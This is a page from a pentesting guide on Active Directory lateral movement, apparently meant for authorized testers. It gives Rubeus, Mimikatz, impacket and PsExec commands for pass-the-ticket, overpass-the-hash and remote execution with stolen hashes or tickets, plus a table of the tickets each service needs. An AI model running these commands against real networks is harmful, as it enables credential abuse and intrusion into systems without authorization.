The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Pass The Ticket (PTT)
  • Tickets - Techniques
  • Overpass The Hash (OTH)
  • S4U2Self Abuse (Constrained Delegation)
  • Alternate Service Name (Constrained Delegation)
  • References

Lateral Movement

Introduction

In this section, you will find some techniques in order to perform lateral movements on Active Directory infrastructuree.

Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.

You can perform this technique with Rubeus.

.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>

Depending on the obtained TGS you, will only be able to perform specific tasks.

Tickets - Techniques

Service Type
Required Tickets

Windows File Share (PsExec)

CIFS

LDAP Operations (DSync)

LDAP

WinRM

HOST HTTP WINRM

WMI

HOST RPCSS

Powershell Remoting

HOST HTTP Depending on OS: WSMAN RPCSS

Schedule Taks

Host

Windows Remote Server Administration Tools

RPCSS LDAP CIFS

Golden Tickets

krbtgt

Overpass The Hash (OTH)

This technique allows a user to request a Kerberos TGT using its NTLM or AES/RC4 hash.

  • Alternative 1 - Without HIGH privileges

# Alternative 1
.\Rubeus.exe asktgt /nowrap /user:<USER> [/dc:<DC_IP>] [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] [/opsec|/force] /ptt 
# Alternative 2
impacket-getTGT <DOMAIN>/<USERSNAME>[:password] -dc-ip <DC_IP> -hashes LMHASH:NTHASH
  • Alterntative 2 - Requires HIGH privileges

[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"

Then, you can use PsExec to access the machine, if the user has administrator privileges.

# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]

S4U2Self Abuse (Constrained Delegation)

Alternate Service Name (Constrained Delegation)

References

Last updated 1 year ago

The -s argument is to upgrade to "nt authority\system", but it will only work if you are going to connect as a highly privileged user.

The exploitation is seen on the .

The exploitation is seen on the .

ℹ️
Attacking Kerberos: Constrained Delegation
Kerberos exploitation phase
Kerberos exploitation phase